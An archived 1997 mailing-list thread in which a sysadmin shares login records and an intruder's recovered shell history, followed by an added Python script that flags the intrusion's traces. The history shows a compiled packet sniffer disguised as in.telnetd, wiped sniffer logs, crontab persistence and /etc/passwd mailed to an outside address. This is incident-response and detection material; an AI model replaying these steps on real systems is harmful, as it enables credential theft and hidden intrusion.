1997-05-24 - Re: System Attack & FBI (fwd)

Header Data

From: ichudov@algebra.com (Igor Chudov @ home)
To: ravage@EINSTEIN.ssz.com (Jim Choate)
Message Hash: 48d6a6f8f2c801eeb376b092accfbdedcafdda27e48989139645f91bd8f9952f
Message ID: <199705240556.AAA11857@manifold.algebra.com>
Reply To: <199705240433.XAA22417@einstein.ssz.com>
UTC Datetime: 1997-05-24 06:05:33 UTC
Raw Date: Sat, 24 May 1997 14:05:33 +0800

Raw message

From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 24 May 1997 14:05:33 +0800
To: ravage@EINSTEIN.ssz.com (Jim Choate)
Subject: Re: System Attack & FBI (fwd)
In-Reply-To: <199705240433.XAA22417@einstein.ssz.com>
Message-ID: <199705240556.AAA11857@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Jim,

I was almost in tears as I was reading your logs.

Instead of simply asking your users to change passwords (always a great 
idea!) please let them know that multiuser Unix systems never offer any
real security or privacy to the users.

I hope that the hacker did not leave any other trojans besides rogue Apache
and in.telnetd.

igor

Jim Choate wrote:
> 
> Hi,
> 
> For your amusement.
> 
>                                        Jim Choate
>                                        CyberTects
>                                        ravage@ssz.com
> 
> 
> Forwarded message:
> > From ravage@ssz.com Fri May 23 23:28:29 1997
> > From: Jim Choate <ravage@ssz.com>
> > Message-Id: <199705240428.XAA22380@einstein.ssz.com>
> > Subject: System Attack & FBI
> > To: users@einstein.ssz.com
> > Date: Fri, 23 May 1997 23:28:27 -0500 (CDT)
> > Cc: staff@einstein.ssz.com
> > X-Mailer: ELM [version 2.4 PL23]
> > Content-Type: text
> > Content-Length: 7477      
> > 
> > 
> > Hi,
> > 
> > As you will see below I have been tracking a waskelly wabbit for the last
> > few weeks. I apologize for any interference with your access but I could
> > not let it go without some sort of response.
> > 
> > I *STRONGLY* advise you to change your password immediately.
> > 
> > I do not expect anyone other than myself to have to talk with the FBI.
> > 
> > If you have any questions please feel free to email me.
> > 
> >                                                  Jim Choate
> >                                                  CyberTects
> >                                                  ravage@ssz.com
> > 
> > 
> > Forwarded message:
> > 
> > > From rberger@rberger.com Fri May 23 23:13:34 1997
> > > Message-Id: <3.0.1.32.19970523234327.006eefec@rberger.com>
> > > X-Sender: rberger@rberger.com
> > > X-Mailer: Windows Eudora Pro Version 3.0.1 (32)
> > > Date: Fri, 23 May 1997 23:43:27 -0500
> > > To: Jim Choate <ravage@einstein.ssz.com>
> > > From: rberger <rberger@rberger.com>
> > > Subject: Re: You have a hacker!
> > > In-Reply-To: <199705240343.WAA22299@einstein.ssz.com>
> > > Mime-Version: 1.0
> > > Content-Type: text/plain; charset="us-ascii"
> > > 
> > > Thank you very much for sending us an e-mail and your logs. We are going
> > > through our FTP logs at this time. Although initial results don't show
> > > corresponding ftps at these times or files. Although a week ago we were
> > > fighting a hacker using the same techniques as shown by the telnet
> > > sessions. So we will be monitoring everything very closely here for a few
> > > more days. Our next search will be the accounts logged in on these ports at
> > > the times given. We have been working with the FBI, along with several
> > > other ISPs in Dallas. If you capture any other logs please send them again
> > > to root@applink.net. If you don't hear anything from us in less than 24
> > > hours please re-send your e-mail message again to my domain
> > > rberger@rberger.com just in case the root e-mail/logs are being monitored &
> > > modified.
> > > 
> > > Regards,
> > > 
> > > Randall Berger,  CEO
> > > AppLink Corporation
> > >  
> > > 
> > > At 10:43 PM 5/23/97 -0500, you wrote:
> > > >
> > > >Hello,
> > > >
> > > > 
> > > > My name is Jim Choate, I own and operate CyberTects a small office - home
> > > > office consultancy in Austin, TX. Over the last couple of weeks I have been
> > > > tracking an intrusion on my system that has involved your systems. I would
> > > > appreciate any help you can provide in resolving this issue.
> > > > 
> > > > I believe a home account for the perp is dkny007@hotmail.com
> > > > 
> > > > I will attach below the relevant files.
> > > > 
> > > > 
> > > >                                                     Jim Choate
> > > >                                                     CyberTects
> > > >                                                     ravage@ssz.com
> > > > 
> > > >  --------------------------------------------------------------------------
> > > > 
> > > > bbixler   ttyp0        app42-73.applink Fri May 23 16:04 - 16:06  (00:01)
> > > > bbixler   ttyp0        app42-75.applink Fri May 23 00:21 - 00:28  (00:07)
> > > > bbixler   ttyp0        app42-90.applink Thu May 22 13:33 - 13:37  (00:03)
> > > > bbixler   ttyp0        app41-50.applink Wed May 21 20:01 - 20:31  (00:30)
> > > > bbixler   ttyp0        app41-47.applink Wed May 21 19:53 - 19:54  (00:00)
> > > > bbixler   ttyp0        app42-85.applink Wed May 21 18:46 - 19:00  (00:14)
> > > > bbixler   ttyp0        app42-75.applink Wed May 21 10:39 - 10:40  (00:00)
> > > > bbixler   ttyp0        app41-52.applink Sun May 18 23:04 - 23:11  (00:07)
> > > > bbixler   ttyp1        app42-78.applink Sat May 17 18:46 - 18:49  (00:02)
> > > > bbixler   ttyp1        app42-67.applink Sat May 17 01:22 - 01:26  (00:03)
> > > > bbixler   ftp          fw6-10.ppp.iadfw Wed May 14 22:27 - 22:28  (00:01)
> > > > bbixler   ttyp1        app42-94.applink Tue May 13 16:12 - 16:18  (00:05)
> > > > bbixler   ttyp0        app42-85.applink Mon May 12 17:02 - 17:05  (00:02)
> > > > bbixler   ttyp0        app42-73.applink Sun May 11 12:29 - 12:36  (00:07)
> > > > bbixler   ttyp0        app42-71.applink Sat May 10 20:15 - 20:17  (00:01)
> > > > bbixler   ttyp0        app42-71.applink Sat May 10 19:40 - 19:50  (00:09)
> > > > bbixler   ttyp0        max2-800-04.eart Wed Feb 12 18:05 - 18:06  (00:00)
> > > > 
> > > > wtmp begins Sun Feb  2 16:36 
> > > > 
> > > >  --------------------------------------------------------------------------
> > > > 
> > > > whoami
> > > > ls
> > > > mv perl-ex.sh /tmp/.bgg
> > > > mkdir /tmp/.bg
> > > > cd /tmp
> > > > cd .bg
> > > > ls
> > > > lynx
> > > > ls
> > > > gcc linsniffer.c 
> > > > ls
> > > > ps
> > > > who
> > > > w
> > > > ps aux
> > > > a.out &
> > > > ls
> > > > ifconfig
> > > > /sbin/ifconfig
> > > > ls
> > > > tail -f tcp.log 
> > > > free
> > > > ls
> > > > cat tcp.log 
> > > > cd ..
> > > > ls
> > > > w
> > > > cd
> > > > cd ..
> > > > ls
> > > > cd ..
> > > > cd /etc
> > > > ls
> > > > minicom
> > > > cd ..
> > > > ls
> > > > cd cdrom.
> > > > cd cdrom
> > > > ls
> > > > cd ..
> > > > cd
> > > > ls
> > > > cd bin
> > > > ls
> > > > cd ..
> > > > cd ..
> > > > ls
> > > > w
> > > > finger
> > > > cd Pphantom
> > > > cat /etc/passwd | grep Pphantom
> > > > cd phantom
> > > > ls
> > > > ls -al
> > > > cat .bash_history 
> > > > cd /etc
> > > > cat hosts
> > > > ls
> > > > cd /tmp
> > > > cd .bg
> > > > cat tcp.log 
> > > > exit
> > > > cd .bg
> > > > ls
> > > > w
> > > > ls
> > > > ls -al
> > > > cat tcp.log 
> > > > ifconfig
> > > > /sbin/ifconfig
> > > > ls
> > > > exit
> > > > mv x.sh /tmp
> > > > cd .bg
> > > > ls
> > > > cd /tmp
> > > > ls
> > > > mv x.sh .bg
> > > > cd .bg
> > > > ls
> > > > kill -9 14523
> > > > ps aux
> > > > mv a.out in.telnetd
> > > > ls
> > > > rm tcp.log 
> > > > ./in.telnetd &
> > > > exit
> > > > pico tcp.log 
> > > > ls
> > > > ps aux
> > > > kill -9 16282
> > > > ls
> > > > ./in.telnetd &
> > > > exit
> > > > cat /dev/null > tcp.log
> > > > w
> > > > exit
> > > > pico tcp.log 
> > > > ls
> > > > ls -al
> > > > cd /etc
> > > > cat passwd
> > > > mail dkny007@hotmail.com < passwd
> > > > exit
> > > > w
> > > > ls -al
> > > > pico tcp.log 
> > > > echo /dev/null > tcp.log 
> > > > ls -al
> > > > ps aux
> > > > quit
> > > > exit
> > > > id
> > > > w
> > > > ftp 
> > > > ls
> > > > mkdir /home/ftp/.tmp
> > > > mkdir /home/ftp/.tmp/.sub
> > > > mv linsniff /home/ftp/.tmp/.sub/
> > > > cd /home/ftp/.tmp/.sub/
> > > > mv linsniff in.te1netd
> > > > ls -l
> > > > chmod 755 in.te1netd 
> > > > in.te1netd &
> > > > ps
> > > > ps aux
> > > > killall in.te1netd
> > > > ls
> > > > ls -a
> > > > ls -l
> > > > in.te1netd &
> > > > /home/ftp/.tmp/.sub/in.te1netd
> > > > /home/ftp/.tmp/.sub/in.te1netd
> > > > ls -s
> > > > rm in.te1netd 
> > > > cd
> > > > ls
> > > > mv hello .h311o
> > > > ftp 
> > > > ls
> > > > mv linsniffer.c /home/ftp/.tmp/.sub/
> > > > cd /home/ftp/.tmp/.sub
> > > > ls
> > > > cc linsniffer.c 
> > > > mv a.out in.te1netd
> > > > chmod 755 in.te1netd 
> > > > ls
> > > > rm linsniffer.c 
> > > > in.te1netd &
> > > > exit
> > > > cd ..
> > > > mv apache.tgz .bg
> > > > cd .bg
> > > > ls
> > > > tar xfvz apache.tgz 
> > > > cd apache_1.2b10/
> > > > ls
> > > > cd src
> > > > make
> > > > ls
> > > > ./Configure 
> > > > make
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd cgi-bin/
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd ..
> > > > ls
> > > > w
> > > > rm -rf apache*
> > > > lynx
> > > > ls
> > > > tar xfvz apache_1.1.3.tar.gz 
> > > > cd apache_1.1.3
> > > > ls
> > > > cd src
> > > > ls
> > > > ./Configure 
> > > > make
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd ..
> > > > ls
> > > > rm -rf apache_1.1.3
> > > > ls
> > > > rm -rf apache_1.1.3.tar.gz 
> > > > w
> > > > exit
> > > > kill -9 14551
> > > > ls
> > > > ls -al
> > > > cd ..
> > > > ls
> > > > cd /home
> > > > ls
> > > > cd ftp
> > > > ls -al
> > > > cd .tm[p
> > > > cd .tmp/
> > > > ls
> > > > ls -al
> > > > cd .sub/
> > > > ls
> > > > rm *
> > > > cd ..
> > > > cd ..
> > > > rm -rf .tmp/
> > > > ls
> > > > cd
> > > > ls
> > > > cd /root
> > > > ls
> > > > cd ssz
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd pgp
> > > > ls
> > > > cd ..
> > > > cd etc
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd /
> > > > ls
> > > > exit
> > > > id
> > > > crontab -e
> > > > ls
> > > > vi .sub
> > > > crontab -e
> > > > ls
> > > > cat /home/ftp/.tmp/.sub/tcp.log
> > > > ps aux
> > > > who
> > > > cd /home/ftp
> > > > ls -a
> > > > mkdir .tmp/.sub
> > > > mkdir .tmp
> > > > cd .tmp
> > > > exit
> > > > cd
> > > > ls
> > > > cd /root
> > > > ls
> > > > cd khg-0.5/
> > > > ls
> > > > cd ..
> > > > cat .bash_history 
> > > > ls
> > > > cd /etc
> > > > ls
> > > > cat hosts
> > > > exit
> > > > 
> > > >
> > > >
> > > >
> > > 
> > 
> 



	- Igor.
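What follows is an added example and is not code from the thread or from Jim's system. It is a small Python triage over the two artefacts Jim posted above: the `last` listing from wtmp and the intruder's recovered shell history. The sample input is constructed from lines on the page; the daemon-name list and the rules are assumptions about what is worth flagging, drawn from what the history shows: hidden working directories under /tmp and the anonymous-FTP tree, linsniffer compiled from source and renamed to in.telnetd or in.te1netd (digit one for the letter ell), tcp.log truncated or removed, /etc/passwd mailed out, and crontab -e for persistence.

```python
"""Triage of a `last` listing and a recovered shell history.  Added example,
not code from the thread; the sample input is constructed from page lines."""
import re
from collections import OrderedDict

# Constructed sample in the shape of the `last` output on the page.
LAST_OUTPUT = """\
bbixler   ttyp0        app42-73.applink Fri May 23 16:04 - 16:06  (00:01)
bbixler   ftp          fw6-10.ppp.iadfw Wed May 14 22:27 - 22:28  (00:01)
bbixler   ttyp0        max2-800-04.eart Wed Feb 12 18:05 - 18:06  (00:00)

wtmp begins Sun Feb  2 16:36
"""

# Constructed sample: commands taken from the recovered history on the page.
HISTORY = """\
whoami
mkdir /tmp/.bg
gcc linsniffer.c
mv a.out in.telnetd
./in.telnetd &
cat /dev/null > tcp.log
mail dkny007@hotmail.com < passwd
mkdir /home/ftp/.tmp/.sub
mv linsniff in.te1netd
chmod 755 in.te1netd
/home/ftp/.tmp/.sub/in.te1netd
crontab -e
ls
"""

# Assumed list of daemon names an intruder would impersonate.  The page shows
# in.telnetd and in.te1netd, so digit-for-letter lookalikes are undone first.
DAEMON_NAMES = {"in.telnetd", "in.ftpd", "in.fingerd", "inetd", "syslogd", "httpd"}
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o"})
SYSTEM_BIN = ("/usr/sbin/", "/sbin/")

def looks_like_daemon(path):
    """True if the basename, homoglyphs undone, is one of DAEMON_NAMES."""
    return path.rsplit("/", 1)[-1].translate(HOMOGLYPHS) in DAEMON_NAMES

# Assumed regex rules (tag, pattern), applied to every history line.
RULES = [
    ("hidden directory under /tmp or the ftp tree",
     re.compile(r"(?:^|\s)(?:/tmp|/var/tmp|/home/ftp)(?:/\S*)?/\.[^\s/.][^\s/]*")),
    ("sniffer compiled from source", re.compile(r"^(?:gcc|cc)\s+\S*sniff\S*\.c")),
    ("sniffer log truncated or removed", re.compile(r">\s*\S*tcp\.log|^rm\s+\S*tcp\.log")),
    ("password file mailed out",
     re.compile(r"^mail\s+.*<\s*(?:/etc/)?(?:passwd|shadow)\b")),
    ("crontab edited (persistence)", re.compile(r"^crontab\s+-e")),
]

def lookalike_tag(cmd):
    """Flag a rename onto a daemon name, or a daemon name run from outside
    the system binary directories (the page's './in.telnetd &')."""
    toks = cmd.split()
    if not toks:
        return None
    if toks[0] in ("mv", "cp") and len(toks) >= 3 and looks_like_daemon(toks[-1]):
        return "binary renamed to impersonate a daemon"
    if looks_like_daemon(toks[0]) and not toks[0].startswith(SYSTEM_BIN):
        return "daemon lookalike run from a non-system path"
    return None

def triage_history(text):
    """Return (line number, tag, command) for every suspicious history line."""
    hits = []
    for n, cmd in enumerate(text.splitlines(), 1):
        cmd = cmd.strip()
        hits.extend((n, tag, cmd) for tag, pat in RULES if pat.search(cmd))
        tag = lookalike_tag(cmd)
        if tag:
            hits.append((n, tag, cmd))
    return hits

LAST_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\w{3} \w{3}\s+\d+ \d\d:\d\d)")

def login_sources(last_text):
    """Per account, the distinct source networks in first-seen order with the
    tty and time of the first login from each.  `last` prints newest first, so
    rows are reversed to get chronological order.  Caveat: classic `last` cuts
    the host column to 16 characters (hence 'app42-73.applink' on the page);
    use `last -a`, which prints the host in the last column, for full names."""
    seen = {}
    rows = [m for m in map(LAST_LINE.match, last_text.splitlines()) if m]
    for m in reversed(rows):
        user, tty, host, when = m.groups()
        network = host.split(".", 1)[1] if "." in host else host
        seen.setdefault(user, OrderedDict()).setdefault(network, (tty, when))
    return {u: list(nets.items()) for u, nets in seen.items()}

if __name__ == "__main__":
    for user, nets in login_sources(LAST_OUTPUT).items():
        for net, (tty, when) in nets:
            print(f"{user}: first login from {net} on {tty} at {when}")
    for n, tag, cmd in triage_history(HISTORY):
        print(f"history line {n}: {tag}: {cmd}")
```

Two caveats go with this. A shell history is only as complete as the intruder let it be (the same session read another user's .bash_history, and an unset HISTFILE or a single rm leaves nothing), so no hits is not evidence of no activity; and the process listing is the thing to check against the history, since a sniffer named in.te1netd in `ps aux` only stands out if the path is compared with the real daemon's.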